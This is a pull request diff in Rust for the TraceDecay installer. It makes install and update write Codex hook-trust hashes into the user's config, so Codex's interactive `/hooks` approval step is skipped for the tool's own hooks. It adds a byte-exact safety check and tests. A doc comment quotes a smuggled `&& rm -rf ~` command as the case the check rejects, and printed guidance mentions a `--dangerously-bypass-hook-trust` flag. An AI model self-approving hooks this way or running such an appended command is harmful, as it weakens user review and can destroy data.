### PR TITLE
feat(agent-hosts): auto-trust Codex managed hooks on install and update

### DIFF
--- a/crates/tracedecay-agent-hosts/src/agents/codex.rs
+++ b/crates/tracedecay-agent-hosts/src/agents/codex.rs
@@ -9,11 +9,15 @@
 //! Codex CLI 0.147.0 publishes `codex plugin add` / `remove` as non-interactive
 //! commands (probed 2026-08-14). TraceDecay stages the plugin source tree and
 //! the personal marketplace entry, then drives those commands for Core
-//! activation. It never writes `~/.codex/config.toml` itself — Codex owns the
-//! `tracedecay@<marketplace>` activation keys and the `[hooks.state]` trust
-//! hashes recorded there. Hook trust still has no non-interactive surface
-//! (`/hooks` inside a session), so doctor reports untrusted hooks instead of
-//! forging hashes. See [`plugin_registry`] for the plugin adoption and
+//! activation. Codex owns the `tracedecay@<marketplace>` activation keys in
+//! `~/.codex/config.toml`; TraceDecay never writes those. Hook trust is
+//! different: `codex plugin add` does not record `[hooks.state]` hashes and
+//! `/hooks` is interactive-only, so after a successful install or
+//! update-plugin TraceDecay records trust for its own managed hooks itself
+//! ([`sync_codex_hook_trust`]) — but only for hooks whose installed command is
+//! byte-for-byte a generated tracedecay command
+//! ([`codex_hook_command_invokes_tracedecay`]); anything else keeps the manual
+//! `/hooks` review. See [`plugin_registry`] for the plugin adoption and
 //! [`mcp_registry`] for the MCP-only (non-plugin) registry.
 //!
 //! Codex's **MCP registry** remains the path for an MCP-only component set
@@ -40,8 +44,10 @@ use super::{
     safe_write_text_file,
 };
 
-/// The prefix every Codex activation key for this plugin starts with. TraceDecay
-/// reads this host-native state but never writes it.
+/// The prefix every Codex activation key for this plugin starts with.
+/// TraceDecay reads the `[plugins]` activation records but never writes them;
+/// the same prefix also names TraceDecay's own `[hooks.state]` trust records,
+/// which [`sync_codex_hook_trust`] does author.
 const CODEX_PLUGIN_ACTIVATION_KEY_PREFIX: &str = "tracedecay@";
 
 mod mcp_registry;
@@ -84,6 +90,11 @@ impl AgentIntegration for CodexIntegration {
         ctx: &InstallContext,
     ) -> Result<NonInteractiveInstallOutcome> {
         install_codex_plugin(&ctx.home, &ctx.tracedecay_bin)?;
+        // Trust the staged hooks now: `codex plugin add` copies this exact
+        // payload into its cache without writing `[hooks.state]`, so recording
+        // the content hashes here is what lets the hooks run without a manual
+        // `/hooks` approval once activation completes.
+        announce_codex_hook_trust(&ctx.home, &ctx.tracedecay_bin);
         Ok(NonInteractiveInstallOutcome::Ready)
     }
 
@@ -162,6 +173,15 @@ impl AgentIntegration for CodexIntegration {
             return Ok(UpdatePluginOutcome::NotInstalled);
         }
         self.activate_deployed_host_registration(ctx)?;
+        // Auto-trust the personal bundle's hooks whenever one is present, so a
+        // refresh (which may have changed hook content) re-pins trust without a
+        // manual /hooks approval. Repo-local-only installs ship no hooks and
+        // have no personal trust surface, so this is a no-op for them.
+        if codex_plugin_manifest_path(&ctx.home).exists()
+            || !codex_plugin_cached_install_dirs(&ctx.home).is_empty()
+        {
+            announce_codex_hook_trust(&ctx.home, &ctx.tracedecay_bin);
+        }
         Ok(UpdatePluginOutcome::Refreshed(staged))
     }
 
@@ -925,11 +945,15 @@ enum CodexHookTrustState {
 ///
 /// The `trust_key` is the fully-qualified `[hooks.state."…"]` table name and
 /// `hash` is the `sha256:<hex>` content hash Codex records as `trusted_hash`.
+/// `command` is the raw installed handler command, kept so the auto-trust
+/// safety valve ([`codex_hook_command_invokes_tracedecay`]) can verify it
+/// before recording trust.
 #[derive(Debug, Clone)]
 struct CodexHookTrustEntry {
     event_label: String,
     trust_key: String,
     hash: String,
+    command: String,
 }
 
 /// Convert a Codex `CamelCase` lifecycle event name to the `snake_case` label
@@ -1061,6 +1085,7 @@ fn codex_hook_trust_entries_for_marketplace(
                     event_label: event_label.clone(),
                     trust_key,
                     hash,
+                    command: command.to_string(),
                 });
             }
         }
@@ -1097,6 +1122,188 @@ fn codex_personal_marketplace_name(home: &Path) -> Result<String> {
             ),
         })?;
     Ok(validate_codex_marketplace_name(name)?.to_string())
+}
+
+/// The hooks payload Codex actually loads: the versioned cache entry when
+/// Codex has installed one, otherwise the staged personal source (what
+/// `codex plugin add` will copy into the cache verbatim).
+fn codex_runtime_hooks_path(home: &Path) -> PathBuf {
+    let cached = codex_plugin_current_cached_install_dir(home).join("hooks/hooks.json");
+    if cached.is_file() {
+        cached
+    } else {
+        codex_plugin_install_dir(home).join("hooks/hooks.json")
+    }
+}
+
+fn codex_installed_hook_trust_entries(home: &Path) -> Result<(String, Vec<CodexHookTrustEntry>)> {
+    let marketplace_name = codex_personal_marketplace_name(home)?;
+    let hooks_path = codex_runtime_hooks_path(home);
+    if !hooks_path.is_file() {
+        return Err(TraceDecayError::Config {
+            message: format!("Codex hooks file not found at {}", hooks_path.display()),
+        });
+    }
+    let hooks = load_json_file_strict(&hooks_path)?;
+    let entries = codex_hook_trust_entries_for_marketplace(&hooks, &marketplace_name)?;
+    Ok((marketplace_name, entries))
+}
+
+/// Safety valve: only auto-trust a hook whose command is byte-for-byte one of
+/// the commands the generator emits for our own managed lifecycle hooks. A
+/// prefix match is unsafe — `<quoted tracedecay> hook-codex-session-start &&
+/// rm -rf ~` starts with our binary token yet smuggles an arbitrary command, so
+/// it would get silently auto-trusted. Requiring full equality with a generated
+/// command (`hook_command(bin, subcommand)` for each known subcommand) rejects
+/// any appended, prepended, or altered payload.
+fn codex_hook_command_invokes_tracedecay(command: &str, tracedecay_bin: &str) -> bool {
+    CODEX_MANAGED_HOOKS
+        .iter()
+        .any(|hook| command == super::hook_command(tracedecay_bin, hook.subcommand))
+}
+
+/// Outcome of a hook-trust re-sync: how many hooks were recorded as trusted and
+/// which (if any) were skipped by the safety valve and still need manual review.
+struct CodexHookTrustSyncOutcome {
+    trusted: usize,
+    skipped: Vec<String>,
+}
+
+/// Record trust for the installed plugin's lifecycle hooks in
+/// `~/.codex/config.toml` so Codex runs them without a manual `/hooks` approval.
+///
+/// Uses the marketplace identity and hook payload actually installed on disk,
+/// pruning stale active/legacy-personal entries while preserving every other
+/// plugin's and the user's own config. Hooks whose command does not exactly
+/// match a generated `TraceDecay` command are skipped (see
+/// [`codex_hook_command_invokes_tracedecay`]). An unreadable/unparseable
+/// `config.toml` surfaces as `Err`, so callers leave it untouched and fall back
+/// to printed guidance.
+fn sync_codex_hook_trust(home: &Path, tracedecay_bin: &str) -> Result<CodexHookTrustSyncOutcome> {
+    let (marketplace_name, entries) = codex_installed_hook_trust_entries(home)?;
+    let config_path = codex_config_path(home);
+    let mut config = load_toml_file(&config_path)?;
+    let table = config
+        .as_table_mut()
+        .ok_or_else(|| TraceDecayError::Config {
+            message: format!("{} is not a TOML table", config_path.display()),
+        })?;
+    let hooks = table
+        .entry("hooks")
+        .or_insert_with(|| toml::Value::Table(toml::value::Table::new()));
+    let hooks = hooks
+        .as_table_mut()
+        .ok_or_else(|| TraceDecayError::Config {
+            message: format!("[hooks] in {} is not a table", config_path.display()),
+        })?;
+    let state = hooks
+        .entry("state")
+        .or_insert_with(|| toml::Value::Table(toml::value::Table::new()));
+    let state = state
+        .as_table_mut()
+        .ok_or_else(|| TraceDecayError::Config {
+            message: format!("[hooks.state] in {} is not a table", config_path.display()),
+        })?;
+
+    // Drop trust for the active marketplace plus the legacy hard-coded
+    // `personal` identity before adding the exact installed payload. Foreign
+    // plugin and repo-local marketplace records remain untouched.
+    let current_prefix = codex_plugin_hook_trust_prefix(&marketplace_name);
+    let legacy_prefix = codex_plugin_hook_trust_prefix(CODEX_DEFAULT_MARKETPLACE_NAME);
+    state.retain(|key, _| {
+        !key.starts_with(&current_prefix)
+            && (current_prefix == legacy_prefix || !key.starts_with(&legacy_prefix))
+    });
+
+    let mut trusted = 0usize;
+    let mut skipped = Vec::new();
+    for entry in &entries {
+        if !codex_hook_command_invokes_tracedecay(&entry.command, tracedecay_bin) {
+            skipped.push(entry.event_label.clone());
+            continue;
+        }
+        let mut record = toml::value::Table::new();
+        record.insert(
+            "trusted_hash".to_string(),
+            toml::Value::String(entry.hash.clone()),
+        );
+        state.insert(entry.trust_key.clone(), toml::Value::Table(record));
+        trusted += 1;
+    }
+
+    write_codex_hook_trust_config(&config_path, &config)?;
+    Ok(CodexHookTrustSyncOutcome { trusted, skipped })
+}
+
+/// Codex's hook loader requires the parent table to be explicit on disk. The
+/// `toml` serializer otherwise emits only `[hooks.state."..."]` child tables,
+/// which parses equivalently but still triggers Codex's hook-review prompt.
+fn write_codex_hook_trust_config(config_path: &Path, config: &toml::Value) -> Result<()> {
+    let backup = super::backup_config_file(config_path)?;
+    let contents = toml::to_string_pretty(config).map_err(|error| TraceDecayError::Config {
+        message: format!("failed to serialize {}: {error}", config_path.display()),
+    })?;
+    let Some(child_offset) = contents.find("[hooks.state.\"") else {
+        return Err(TraceDecayError::Config {
+            message: "Codex hook trust state serialized without hook entries".to_string(),
+        });
+    };
+    let mut updated = String::with_capacity(contents.len() + "[hooks.state]\n\n".len());
+    updated.push_str(&contents[..child_offset]);
+    updated.push_str("[hooks.state]\n\n");
+    updated.push_str(&contents[child_offset..]);
+    super::safe_write_text_file(config_path, &updated, backup.as_deref())?;
+    eprintln!("\x1b[32m✔\x1b[0m Wrote {}", config_path.display());
+    Ok(())
+}
+
+/// Auto-trust the installed plugin's hooks, printing a concise confirmation on
+/// full success and falling back to [`print_hook_trust_guidance`] whenever a
+/// hook is skipped by the safety valve or the config could not be written.
+fn announce_codex_hook_trust(home: &Path, tracedecay_bin: &str) {
+    let config_path = codex_config_path(home);
+    match sync_codex_hook_trust(home, tracedecay_bin) {
+        Ok(outcome) if outcome.skipped.is_empty() => {
+            eprintln!(
+                "\x1b[32m✔\x1b[0m Trusted {} Codex hook(s) in {}",
+                outcome.trusted,
+                config_path.display()
+            );
+        }
+        Ok(outcome) => {
+            if outcome.trusted > 0 {
+                eprintln!(
+                    "\x1b[32m✔\x1b[0m Trusted {} Codex hook(s) in {}",
+                    outcome.trusted,
+                    config_path.display()
+                );
+            }
+            eprintln!(
+                "  Skipped auto-trust for {} (command does not invoke the tracedecay binary).",
+                outcome.skipped.join(", ")
+            );
+            print_hook_trust_guidance();
+        }
+        Err(err) => {
+            eprintln!("  Could not auto-trust Codex hooks: {err}");
+            print_hook_trust_guidance();
+        }
+    }
+}
+
+/// Codex requires non-managed command hooks to be trusted via `/hooks` before
+/// they run; newly installed/changed hooks are skipped until trusted. Printed
+/// only when auto-trust could not cover every managed hook.
+fn print_hook_trust_guidance() {
+    eprintln!();
+    eprintln!(
+        "\x1b[1mAction required:\x1b[0m Codex skips new/changed command hooks until you trust them."
+    );
+    eprintln!("  Run \x1b[1m/hooks\x1b[0m inside Codex to review and trust the tracedecay hooks.");
+    eprintln!(
+        "  (For one-off non-interactive runs you can pass --dangerously-bypass-hook-trust, \
+         but trusting via /hooks is recommended.)"
+    );
 }
 
 /// Whether Codex's host-native registration records identify TraceDecay. A
@@ -1812,8 +2019,7 @@ fn doctor_check_native_activation(dc: &mut DoctorCounters, home: &Path) {
             "Codex reports tracedecay@{marketplace_name} not installed — {} has no \
              `[plugins.\"tracedecay@{marketplace_name}\"] enabled = true`, so the MCP server, \
              skills, and hooks never load. Run `tracedecay install --agent codex` (drives \
-             `codex plugin add tracedecay@{marketplace_name}`), then `/hooks` inside Codex to \
-             trust the managed hooks",
+             `codex plugin add tracedecay@{marketplace_name}` and auto-trusts the managed hooks)",
             config_path.display()
         )),
         Err(()) => dc.fail(&format!(
@@ -1824,10 +2030,11 @@ fn doctor_check_native_activation(dc: &mut DoctorCounters, home: &Path) {
     }
 }
 
-/// The one Codex step TraceDecay cannot perform after a successful install:
-/// hook trust is Codex-owned (`/hooks` inside a session). Returns follow-up
+/// Install and update-plugin auto-trust the managed hooks
+/// ([`sync_codex_hook_trust`]), but the safety valve skips tampered commands
+/// and an unwritable config leaves trust unrecorded. Returns follow-up
 /// guidance while any managed hook is untrusted or stale, and `None` once
-/// Codex records explicit, current trust for every managed hook.
+/// explicit, current trust exists for every managed hook.
 pub fn codex_hook_trust_followup(home: &Path) -> Option<String> {
     let marketplace_name = codex_cached_marketplace_name(home);
     let hooks_path = [
@@ -1848,7 +2055,7 @@ pub fn codex_hook_trust_followup(home: &Path) -> Option<String> {
                 .is_ok_and(|contents| codex_hook_state_table_is_explicit(&contents))
     });
     (!trusted_and_explicit).then(|| {
-        "Codex hook trust is host-owned: run `/hooks` inside a Codex session to trust the \
+        "Codex hook trust is not yet recorded: run `/hooks` inside a Codex session to trust the \
          tracedecay lifecycle hooks (Codex silently skips untrusted hooks)"
             .to_string()
     })

--- a/crates/tracedecay-agent-hosts/src/agents/codex.rs
+++ b/crates/tracedecay-agent-hosts/src/agents/codex.rs
@@ -1296,9 +1296,7 @@ fn prune_codex_hook_trust_records(home: &Path) -> Result<()> {
         return Ok(());
     }
     let state_empty = state.is_empty();
-    if state_empty
-        && let Some(hooks) = table.get_mut("hooks").and_then(toml::Value::as_table_mut)
-    {
+    if state_empty && let Some(hooks) = table.get_mut("hooks").and_then(toml::Value::as_table_mut) {
         hooks.remove("state");
         if hooks.is_empty() {
             table.remove("hooks");
@@ -1312,8 +1310,7 @@ fn prune_codex_hook_trust_records(home: &Path) -> Result<()> {
     // Codex's hook loader requires (see [`write_codex_hook_trust_config`]).
     let updated = match contents.find("[hooks.state.\"") {
         Some(child_offset) => {
-            let mut updated =
-                String::with_capacity(contents.len() + "[hooks.state]\n\n".len());
+            let mut updated = String::with_capacity(contents.len() + "[hooks.state]\n\n".len());
             updated.push_str(&contents[..child_offset]);
             updated.push_str("[hooks.state]\n\n");
             updated.push_str(&contents[child_offset..]);

--- a/crates/tracedecay-agent-hosts/src/agents/codex.rs
+++ b/crates/tracedecay-agent-hosts/src/agents/codex.rs
@@ -12,10 +12,11 @@
 //! activation. Codex owns the `tracedecay@<marketplace>` activation keys in
 //! `~/.codex/config.toml`; TraceDecay never writes those. Hook trust is
 //! different: `codex plugin add` does not record `[hooks.state]` hashes and
-//! `/hooks` is interactive-only, so after a successful install or
-//! update-plugin TraceDecay records trust for its own managed hooks itself
-//! ([`sync_codex_hook_trust`]) — but only for hooks whose installed command is
-//! byte-for-byte a generated tracedecay command
+//! `/hooks` is interactive-only, so activation records trust for TraceDecay's
+//! own managed hooks ([`sync_codex_hook_trust`]) and deactivation prunes those
+//! records again ([`prune_codex_hook_trust_records`]) — both inside the
+//! component transaction's rollback boundary. Trust is recorded only for hooks
+//! whose installed command is byte-for-byte a generated tracedecay command
 //! ([`codex_hook_command_invokes_tracedecay`]); anything else keeps the manual
 //! `/hooks` review. See [`plugin_registry`] for the plugin adoption and
 //! [`mcp_registry`] for the MCP-only (non-plugin) registry.
@@ -90,11 +91,6 @@ impl AgentIntegration for CodexIntegration {
         ctx: &InstallContext,
     ) -> Result<NonInteractiveInstallOutcome> {
         install_codex_plugin(&ctx.home, &ctx.tracedecay_bin)?;
-        // Trust the staged hooks now: `codex plugin add` copies this exact
-        // payload into its cache without writing `[hooks.state]`, so recording
-        // the content hashes here is what lets the hooks run without a manual
-        // `/hooks` approval once activation completes.
-        announce_codex_hook_trust(&ctx.home, &ctx.tracedecay_bin);
         Ok(NonInteractiveInstallOutcome::Ready)
     }
 
@@ -172,16 +168,8 @@ impl AgentIntegration for CodexIntegration {
         if staged.is_empty() {
             return Ok(UpdatePluginOutcome::NotInstalled);
         }
+        // Activation also re-pins hook trust for the refreshed bundle.
         self.activate_deployed_host_registration(ctx)?;
-        // Auto-trust the personal bundle's hooks whenever one is present, so a
-        // refresh (which may have changed hook content) re-pins trust without a
-        // manual /hooks approval. Repo-local-only installs ship no hooks and
-        // have no personal trust surface, so this is a no-op for them.
-        if codex_plugin_manifest_path(&ctx.home).exists()
-            || !codex_plugin_cached_install_dirs(&ctx.home).is_empty()
-        {
-            announce_codex_hook_trust(&ctx.home, &ctx.tracedecay_bin);
-        }
         Ok(UpdatePluginOutcome::Refreshed(staged))
     }
 
@@ -355,23 +343,41 @@ impl AgentIntegration for CodexIntegration {
     }
 
     fn activate_deployed_host_registration(&self, ctx: &InstallContext) -> Result<()> {
-        if codex_plugin_is_natively_active(&ctx.home, Some(&ctx.tracedecay_bin))? {
-            return Ok(());
+        if !codex_plugin_is_natively_active(&ctx.home, Some(&ctx.tracedecay_bin))? {
+            let marketplace_name = codex_cached_marketplace_name(&ctx.home);
+            let codex_cli = plugin_registry::require_codex_plugin_cli()?;
+            plugin_registry::codex_plugin_add_with(&codex_cli, &ctx.home, &marketplace_name)?;
         }
-        let marketplace_name = codex_cached_marketplace_name(&ctx.home);
-        let codex_cli = plugin_registry::require_codex_plugin_cli()?;
-        plugin_registry::codex_plugin_add_with(&codex_cli, &ctx.home, &marketplace_name)
+        // Auto-trust the personal bundle's hooks whenever one is present:
+        // `codex plugin add` never writes `[hooks.state]`, and an
+        // already-active install may still carry missing or stale trust.
+        // Activation runs inside the component transaction's write-intent
+        // scope, so a rejected install/update rolls this write back with the
+        // rest of `config.toml`. Repo-local-only installs ship no hooks and
+        // have no personal trust surface, so this is a no-op for them.
+        if codex_plugin_manifest_path(&ctx.home).exists()
+            || !codex_plugin_cached_install_dirs(&ctx.home).is_empty()
+        {
+            announce_codex_hook_trust(&ctx.home, &ctx.tracedecay_bin);
+        }
+        Ok(())
     }
 
     fn deactivate_deployed_host_registration(&self, ctx: &InstallContext) -> Result<()> {
-        if !codex_plugin_is_natively_active(&ctx.home, Some(&ctx.tracedecay_bin))?
-            && !codex_plugin_enabled(&ctx.home).unwrap_or(false)
+        if codex_plugin_is_natively_active(&ctx.home, Some(&ctx.tracedecay_bin))?
+            || codex_plugin_enabled(&ctx.home).unwrap_or(false)
         {
-            return Ok(());
+            let marketplace_name = codex_cached_marketplace_name(&ctx.home);
+            let codex_cli = plugin_registry::require_codex_plugin_cli()?;
+            plugin_registry::codex_plugin_remove_with(&codex_cli, &ctx.home, &marketplace_name)?;
         }
-        let marketplace_name = codex_cached_marketplace_name(&ctx.home);
-        let codex_cli = plugin_registry::require_codex_plugin_cli()?;
-        plugin_registry::codex_plugin_remove_with(&codex_cli, &ctx.home, &marketplace_name)
+        // `codex plugin remove` deliberately never touches `[hooks.state]`,
+        // so the managed trust records written at install/update time would
+        // otherwise survive as registration residue and hold uninstall
+        // verification at Repairable instead of Missing. Prune them here,
+        // inside the transaction's rollback boundary, preserving foreign
+        // plugins' records.
+        prune_codex_hook_trust_records(&ctx.home)
     }
 
     /// Split by component: the MCP-only set is driven through Codex's own
@@ -1254,6 +1260,72 @@ fn write_codex_hook_trust_config(config_path: &Path, config: &toml::Value) -> Re
     updated.push_str(&contents[child_offset..]);
     super::safe_write_text_file(config_path, &updated, backup.as_deref())?;
     eprintln!("\x1b[32m✔\x1b[0m Wrote {}", config_path.display());
+    Ok(())
+}
+
+/// Remove every TraceDecay-managed `[hooks.state]` trust record from
+/// `~/.codex/config.toml`, preserving foreign plugins' records and all
+/// unrelated config. `codex plugin remove` never touches `[hooks.state]`, so
+/// without this prune the records written by [`sync_codex_hook_trust`] would
+/// survive uninstall as registration residue ([`codex_registration_residue`])
+/// and hold the post-uninstall registration state at Repairable. Emptied
+/// `[hooks.state]`/`[hooks]` tables are dropped so a clean uninstall leaves no
+/// hollow managed sections behind.
+fn prune_codex_hook_trust_records(home: &Path) -> Result<()> {
+    let config_path = codex_config_path(home);
+    if !config_path.exists() {
+        return Ok(());
+    }
+    let mut config = load_toml_file(&config_path)?;
+    let Some(table) = config.as_table_mut() else {
+        return Err(TraceDecayError::Config {
+            message: format!("{} is not a TOML table", config_path.display()),
+        });
+    };
+    let Some(state) = table
+        .get_mut("hooks")
+        .and_then(toml::Value::as_table_mut)
+        .and_then(|hooks| hooks.get_mut("state"))
+        .and_then(toml::Value::as_table_mut)
+    else {
+        return Ok(());
+    };
+    let before = state.len();
+    state.retain(|key, _| !key.starts_with(CODEX_PLUGIN_ACTIVATION_KEY_PREFIX));
+    if state.len() == before {
+        return Ok(());
+    }
+    let state_empty = state.is_empty();
+    if state_empty
+        && let Some(hooks) = table.get_mut("hooks").and_then(toml::Value::as_table_mut)
+    {
+        hooks.remove("state");
+        if hooks.is_empty() {
+            table.remove("hooks");
+        }
+    }
+    let backup = super::backup_config_file(&config_path)?;
+    let contents = toml::to_string_pretty(&config).map_err(|error| TraceDecayError::Config {
+        message: format!("failed to serialize {}: {error}", config_path.display()),
+    })?;
+    // Foreign trust records that remain still need the explicit parent table
+    // Codex's hook loader requires (see [`write_codex_hook_trust_config`]).
+    let updated = match contents.find("[hooks.state.\"") {
+        Some(child_offset) => {
+            let mut updated =
+                String::with_capacity(contents.len() + "[hooks.state]\n\n".len());
+            updated.push_str(&contents[..child_offset]);
+            updated.push_str("[hooks.state]\n\n");
+            updated.push_str(&contents[child_offset..]);
+            updated
+        }
+        None => contents,
+    };
+    super::safe_write_text_file(&config_path, &updated, backup.as_deref())?;
+    eprintln!(
+        "\x1b[32m✔\x1b[0m Removed tracedecay hook trust records from {}",
+        config_path.display()
+    );
     Ok(())
 }
 

--- a/crates/tracedecay-agent-hosts/src/agents/codex/plugin_registry.rs
+++ b/crates/tracedecay-agent-hosts/src/agents/codex/plugin_registry.rs
@@ -17,10 +17,11 @@
 //! --json` exits 0 without a TTY, writes `[plugins."tracedecay@personal"]
 //! enabled = true` into `~/.codex/config.toml`, and copies the staged source
 //! into `~/.codex/plugins/cache/personal/tracedecay/<version>`. It does **not**
-//! write `[hooks.state]` — hook trust stays Codex-owned via `/hooks`.
+//! write `[hooks.state]` — TraceDecay records trust for its own managed hooks
+//! separately (see [`super::sync_codex_hook_trust`] and its safety valve).
 //!
 //! That is the same host-capability shape already adopted for `codex mcp add`
-//! in [`super::mcp_registry`]: TraceDecay never authors `config.toml`; it
+//! in [`super::mcp_registry`]: this module never authors `config.toml`; it
 //! drives Codex's own command and records the exact post-command bytes for
 //! rollback. The MCP-only / Core split is unchanged: a `Core`-bearing set
 //! takes this plugin path, and an MCP-only set still uses the MCP registry
@@ -52,8 +53,9 @@ const CODEX_PLUGINS_KEY: &str = "plugins";
 /// accept a plugin command that also rewrites MCP servers.
 const CODEX_MCP_SERVERS_KEY: &str = "mcp_servers";
 
-/// TOML key holding Codex's hook-trust records. Read only: `/hooks` stays
-/// Codex-owned even after plugin add succeeds.
+/// TOML key holding Codex's hook-trust records. Read only *here*: the plugin
+/// CLI must never disturb trust records; TraceDecay writes its own managed
+/// entries through [`super::sync_codex_hook_trust`], outside any CLI run.
 const CODEX_HOOKS_KEY: &str = "hooks";
 
 /// Resolve Codex's own CLI, or fail with the typed requirement.

--- a/crates/tracedecay-agent-hosts/src/agents/codex/tests.rs
+++ b/crates/tracedecay-agent-hosts/src/agents/codex/tests.rs
@@ -272,9 +272,297 @@ trusted_hash = "sha256:stop"
     );
 }
 
-/// The install-output follow-up must stand until Codex itself records
-/// explicit, current trust for every managed hook — the one activation step
-/// TraceDecay cannot perform — and clear the moment it has.
+#[test]
+fn sync_codex_hook_trust_records_entries_and_preserves_unrelated_config() {
+    let home = tempfile::tempdir().expect("tempdir");
+    install_codex_personal_bootstrap(home.path(), TEST_BIN).unwrap();
+    let codex_dir = home.path().join(".codex");
+    std::fs::create_dir_all(&codex_dir).unwrap();
+    let config_path = codex_dir.join("config.toml");
+    // Seed unrelated user content plus a foreign plugin's trust entry.
+    std::fs::write(
+        &config_path,
+        r#"model = "o4-mini"
+
+[hooks.state."other@plugin:hooks/hooks.json:session_start:0:0"]
+trusted_hash = "sha256:foreign"
+"#,
+    )
+    .unwrap();
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::PermissionsExt;
+        std::fs::set_permissions(&config_path, std::fs::Permissions::from_mode(0o600)).unwrap();
+    }
+
+    let outcome = sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+    assert_eq!(outcome.trusted, CODEX_MANAGED_HOOKS.len());
+    assert!(outcome.skipped.is_empty());
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::PermissionsExt;
+        assert_eq!(
+            std::fs::metadata(&config_path)
+                .unwrap()
+                .permissions()
+                .mode()
+                & 0o777,
+            0o600
+        );
+    }
+
+    let config_text = std::fs::read_to_string(&config_path).unwrap();
+    assert!(
+        config_text.lines().any(|line| line == "[hooks.state]"),
+        "Codex requires an explicit [hooks.state] parent table before trusting child records"
+    );
+
+    let entries = managed_entries(TEST_BIN);
+    let config = load_toml_file(&config_path).unwrap();
+    let state = config["hooks"]["state"].as_table().unwrap();
+    for entry in &entries {
+        assert_eq!(
+            state[&entry.trust_key]["trusted_hash"].as_str().unwrap(),
+            entry.hash,
+            "trust entry for {} not recorded exactly",
+            entry.event_label
+        );
+    }
+    // Unrelated content and the foreign entry survive.
+    assert_eq!(config["model"].as_str().unwrap(), "o4-mini");
+    assert_eq!(
+        state["other@plugin:hooks/hooks.json:session_start:0:0"]["trusted_hash"]
+            .as_str()
+            .unwrap(),
+        "sha256:foreign"
+    );
+    assert_eq!(
+        codex_plugin_hook_trust_state(&config, &entries),
+        CodexHookTrustState::Trusted
+    );
+
+    // Idempotent: a second sync leaves the same records (managed + 1 foreign).
+    let outcome2 = sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+    assert_eq!(outcome2.trusted, CODEX_MANAGED_HOOKS.len());
+    let config2 = load_toml_file(&config_path).unwrap();
+    assert_eq!(
+        config2["hooks"]["state"].as_table().unwrap().len(),
+        CODEX_MANAGED_HOOKS.len() + 1
+    );
+}
+
+#[test]
+fn sync_codex_hook_trust_prunes_stale_and_preserves_foreign_entries() {
+    let home = tempfile::tempdir().expect("tempdir");
+    install_codex_personal_bootstrap(home.path(), TEST_BIN).unwrap();
+    let codex_dir = home.path().join(".codex");
+    std::fs::create_dir_all(&codex_dir).unwrap();
+    let config_path = codex_dir.join("config.toml");
+    // A leftover tracedecay-personal entry for a removed event, plus a foreign
+    // plugin entry that must be preserved.
+    std::fs::write(
+        &config_path,
+        r#"
+[hooks.state."tracedecay@personal:hooks/hooks.json:pre_tool_use:0:0"]
+trusted_hash = "sha256:stale"
+
+[hooks.state."other@plugin:hooks/hooks.json:session_start:0:0"]
+trusted_hash = "sha256:foreign"
+"#,
+    )
+    .unwrap();
+
+    sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+
+    let config = load_toml_file(&config_path).unwrap();
+    let state = config["hooks"]["state"].as_table().unwrap();
+    assert!(
+        !state.contains_key("tracedecay@personal:hooks/hooks.json:pre_tool_use:0:0"),
+        "stale tracedecay-personal entry should be pruned"
+    );
+    assert_eq!(
+        state["other@plugin:hooks/hooks.json:session_start:0:0"]["trusted_hash"]
+            .as_str()
+            .unwrap(),
+        "sha256:foreign",
+        "foreign plugin entry must be preserved"
+    );
+    assert!(
+        state.contains_key("tracedecay@personal:hooks/hooks.json:session_start:0:0"),
+        "current managed events should be recorded"
+    );
+}
+
+#[test]
+fn sync_codex_hook_trust_uses_preserved_marketplace_identity() {
+    let home = tempfile::tempdir().expect("tempdir");
+    let marketplace_path = codex_personal_marketplace_path(home.path());
+    std::fs::create_dir_all(marketplace_path.parent().unwrap()).unwrap();
+    std::fs::write(
+        &marketplace_path,
+        r#"{
+  "name": "my-marketplace",
+  "interface": { "displayName": "My Marketplace" },
+  "plugins": []
+}"#,
+    )
+    .unwrap();
+    install_codex_personal_bootstrap(home.path(), TEST_BIN).unwrap();
+    std::fs::create_dir_all(home.path().join(".codex")).unwrap();
+
+    let outcome = sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+    assert_eq!(outcome.trusted, CODEX_MANAGED_HOOKS.len());
+
+    let config = load_toml_file(&codex_config_path(home.path())).unwrap();
+    let state = config["hooks"]["state"].as_table().unwrap();
+    assert!(
+        state
+            .keys()
+            .all(|key| key.starts_with("tracedecay@my-marketplace:hooks/hooks.json:"))
+    );
+    assert!(
+        state
+            .keys()
+            .all(|key| !key.starts_with("tracedecay@personal:hooks/hooks.json:"))
+    );
+}
+
+#[test]
+fn sync_codex_hook_trust_hashes_the_installed_hook_payload() {
+    let home = tempfile::tempdir().expect("tempdir");
+    let plugin_dir = install_codex_personal_bootstrap(home.path(), TEST_BIN).unwrap();
+    let hooks_path = plugin_dir.join("hooks/hooks.json");
+    let mut hooks = load_json_file_strict(&hooks_path).unwrap();
+    hooks["hooks"]["SessionStart"][0]["hooks"][0]["timeout"] = json!(9);
+    safe_write_json_file(&hooks_path, &hooks, None).unwrap();
+    let changed_entries = codex_hook_trust_entries(&hooks).unwrap();
+    std::fs::create_dir_all(home.path().join(".codex")).unwrap();
+
+    sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+
+    let config = load_toml_file(&codex_config_path(home.path())).unwrap();
+    assert_eq!(
+        codex_plugin_hook_trust_state(&config, &changed_entries),
+        CodexHookTrustState::Trusted,
+        "trust must cover the exact hook payload installed for Codex"
+    );
+}
+
+#[test]
+fn sync_codex_hook_trust_reads_a_custom_marketplace_cache() {
+    let home = tempfile::tempdir().expect("tempdir");
+    let marketplace_path = codex_personal_marketplace_path(home.path());
+    std::fs::create_dir_all(marketplace_path.parent().unwrap()).unwrap();
+    std::fs::write(
+        &marketplace_path,
+        r#"{
+  "name": "my-marketplace",
+  "interface": { "displayName": "My Marketplace" },
+  "plugins": [{"name": "tracedecay"}]
+}"#,
+    )
+    .unwrap();
+    let plugin_dir = home.path().join(format!(
+        ".codex/plugins/cache/my-marketplace/tracedecay/{}",
+        crate::PRODUCT_VERSION
+    ));
+    install_codex_plugin_bundle(&plugin_dir, TEST_BIN, InstallScope::Global, home.path()).unwrap();
+    let hooks_path = plugin_dir.join("hooks/hooks.json");
+    let mut hooks = load_json_file_strict(&hooks_path).unwrap();
+    hooks["hooks"]["SessionStart"][0]["hooks"][0]["timeout"] = json!(9);
+    safe_write_json_file(&hooks_path, &hooks, None).unwrap();
